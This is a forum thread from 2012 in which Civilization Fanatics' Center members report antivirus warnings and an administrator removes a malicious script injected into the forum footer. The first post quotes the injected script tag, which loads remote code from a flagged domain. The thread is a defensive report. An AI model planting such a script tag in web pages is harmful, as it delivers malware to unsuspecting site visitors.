Advertisement
Civilization Fanatics' Center  

Welcome to Civilization Fanatics' Center.

You are currently viewing our site as a guest which gives you limited access to our site features. By joining our free community, you will be able to participate in the discussions, search the forum, send private messages, vote in polls, upload your own screenshots to the gallery, and access many other special features. Registration is fast, simple and absolutely free, so sign up today! If you have any problems with the registration process or your account login, please contact support.

Go Back   Civilization Fanatics' Forums > CIVFANATICS > Site Feedback

Notices

Reply
 
Thread Tools
Old Jun 19, 2012, 12:13 PM   #1
Mise
isle of lucy
 
Mise's Avatar
 
Join Date: Apr 2004
Location: London, UK
Posts: 25,079
Malware warning on various CFC pages

I'm getting warnings from my antivirus software (avast) about some weird site on basically all CFC pages. The site is http://www.sslcheck0992.com; it's saying that the site is malicious. There's no way I'm actually going to go to that site to check it out -- maybe someone can do it in a fresh VM. But I've added it to my hosts file, and I suggest you all do too (just like with that www.booklandonline.info or whatever it was).

Anyway, I think someone is putting some dodgy scripts onto CFC. This script is in the source of all pages I've checked:

<script type="text/javascript" async="async" src="http://www.sslcheck0992.com/cms/index.php"></script>

I see that it's got "async" -- I assume this is to prevent the site from hanging on the script, like on www.booklandonline.info did before.

Can the admins please check that the site hasn't been compromised? I recommend users not use the site without an antivirus software...
__________________
Come to fiftychat! It's where downtown hangs out!
Mise is online now   Reply With Quote
Old Jun 19, 2012, 12:21 PM   #2
Thunderfall
Administrator

 
Thunderfall's Avatar
 
Join Date: Oct 2000
Location: NY, USA
Posts: 11,730
Images: 1545
Thanks Mise. I have removed it. It's in forum footer like last time.

I will look into it further.

We do plan to upgrade forum in the near future.

Anything you think suspicious, please PM or email me, or post here.
__________________
Thunderfall
Weight: 1.0
Value: 161
Cast When used
Shock Damage 1 to 25 points on Touch
Thunderfall is offline   Reply With Quote
Old Jun 19, 2012, 12:35 PM   #3
Mise
isle of lucy
 
Mise's Avatar
 
Join Date: Apr 2004
Location: London, UK
Posts: 25,079
Thanks for sorting it so quickly, TF!
__________________
Come to fiftychat! It's where downtown hangs out!
Mise is online now   Reply With Quote
Old Jun 19, 2012, 02:49 PM   #4
dusckr87
Prince
 
Join Date: Feb 2010
Posts: 577
Does this have anything to do with why the "back" (or refresh) button on the browser always displayed a blank page, but is now working correctly?

Last edited by dusckr87; Jun 19, 2012 at 03:11 PM.
dusckr87 is offline   Reply With Quote
Old Jun 21, 2012, 06:44 AM   #5
El_Machinae
Colour vision since 2018
 
El_Machinae's Avatar
 
Join Date: Nov 2005
Location: Pale Blue Dot youtube=wupToqz1e2g
Posts: 30,779
So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?
__________________
2.0% of income to true poverty (society only invests 2% to total charity)
0.5% of income to medical R&D (society only invests 0.5% to medical R&D, and leaves mental illness underfunded)
eff hunger; eff infant diarrhea; eff malaria; eff polio; eff cancer; eff Alzheimer's; eff depression
You and me: pro-actively
El_Machinae is offline   Reply With Quote
Old Jun 22, 2012, 01:42 AM   #6
Sir_Lancelot
Emperor
 
Sir_Lancelot's Avatar
 
Join Date: Mar 2006
Location: Europe
Posts: 1,358
Was the forum hacked or did it come with infected ads? I'm interested in knowing/understanding how this is happening.
__________________


The world is not enough...
Sir_Lancelot is offline   Reply With Quote
Old Jun 22, 2012, 12:02 PM   #7
aaronlk
Chieftain
 
Join Date: Dec 2005
Posts: 42
Does this have anything to do with these pop-up flash video ads I'm seeing on the site? Or are these ads legitimate?
aaronlk is offline   Reply With Quote
Old Jun 24, 2012, 08:45 PM   #8
LucyDuke
staring at the clock
 
LucyDuke's Avatar
 
Join Date: Jan 2007
Location: where mise
Posts: 13,285
Quote:
Originally Posted by El_Machinae View Post
So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?
Could be explained by something else blocking them in the first place.
__________________
this week in #fiftychat: special guest
LucyDuke is offline   Reply With Quote
Old Jun 25, 2012, 01:18 AM   #9
Sir_Lancelot
Emperor
 
Sir_Lancelot's Avatar
 
Join Date: Mar 2006
Location: Europe
Posts: 1,358
Quote:
Originally Posted by El_Machinae View Post
So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?
It happened over a month ago. Security warning on bad certificate.

Norton did not detect anything at that time, my browser did. I think it was the same way with everyone else who noticed something.
__________________


The world is not enough...
Sir_Lancelot is offline   Reply With Quote
Old Jun 26, 2012, 07:33 AM   #10
El_Machinae
Colour vision since 2018
 
El_Machinae's Avatar
 
Join Date: Nov 2005
Location: Pale Blue Dot youtube=wupToqz1e2g
Posts: 30,779
Yeah, my browser didn't detect it. My Norton didn't detect it. Oh no!
__________________
2.0% of income to true poverty (society only invests 2% to total charity)
0.5% of income to medical R&D (society only invests 0.5% to medical R&D, and leaves mental illness underfunded)
eff hunger; eff infant diarrhea; eff malaria; eff polio; eff cancer; eff Alzheimer's; eff depression
You and me: pro-actively
El_Machinae is offline   Reply With Quote
Old Jun 27, 2012, 04:13 PM   #11
Arwon
Show me your moves
 
Arwon's Avatar
 
Join Date: Oct 2006
Location: Canberra
Posts: 12,262
My work filter is now flagging this whole site as malware too.
__________________
He wants a shoe horn, the kind with teeth
People should get beat up for statin' their beliefs
- TMBG

PC: Left/Right: -2.00, Libertarian/Authoritarian: -7.13

Reptilians Anonymous
Arwon is offline   Reply With Quote
Old Jun 27, 2012, 07:07 PM   #12
MjM
General Misenhower
 
MjM's Avatar
 
Join Date: Jun 2004
Location: Britain
Posts: 7,079
My AdAware said the whole site was infected as well. What's with this?
MjM is offline   Reply With Quote
Old Jun 27, 2012, 07:48 PM   #13
The_J
Say No 2 Net Validations

 
The_J's Avatar
 
Join Date: Oct 2008
Location: Germany / Netherlands
Posts: 24,851
Images: 51
Must be a false positive recognition due to whatever has happened here at the 19th .
One corporate software solution seems to have caught that, see http://www.stopbadware.org/reports/7...55f2ca5aabe774

Else we seem to be clean:
http://www.google.com/safebrowsing/d...ivfanatics.com
http://www.siteadvisor.com/sites/civfanatics.com

->
__________________
Civ4-BtS-Mod "Mars, Now!"


Steam eats the souls of little gamers!!!
The_J is offline   Reply With Quote
Old Jun 29, 2012, 06:28 AM   #14
City Builder
Complicated Complication
 
City Builder's Avatar
 
Join Date: Sep 2006
Location: In your moms basement
Posts: 150
Cool

I just went to unsubscribe from a topic that I must have subscribed to years ago maybe, and got the following warning in Google's Chrome browser:

Warning: Something's Not Right Here!

forums.civfanatics.com contains content from www.weplayciv.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

We have already notified www.weplayciv.com that we found malware on the site. For more about the problems found on www.weplayciv.com, visit the Google Safe Browsing diagnostic page.

-------------------------------
The message in Chrome was coming up after I unsubscribed from a topic and then you get shown the redirect box that then sends you normally back to the topic that you unsubscribed from, from that redirect page is when Google Chrome catches it and pops up the message that I listed above.
City Builder is offline   Reply With Quote
Old Jun 29, 2012, 06:37 AM   #15
The_J
Say No 2 Net Validations

 
The_J's Avatar
 
Join Date: Oct 2008
Location: Germany / Netherlands
Posts: 24,851
Images: 51
WPC also had a small problem with probably a false positive report some time ago (fixed now). -> you can ignore that warning.
__________________
Civ4-BtS-Mod "Mars, Now!"


Steam eats the souls of little gamers!!!
The_J is offline   Reply With Quote
Reply

Bookmarks

Go Back Civilization Fanatics' Forums > CIVFANATICS > Site Feedback > Malware warning on various CFC pages

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off



Advertisement

All times are GMT -6. The time now is 08:32 AM.


Powered by vBulletin®
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
This site is copyright © Civilization Fanatics' Center.
Support CFC: Amazon.com | Amazon UK | Amazon DE | Amazon CA | Amazon FR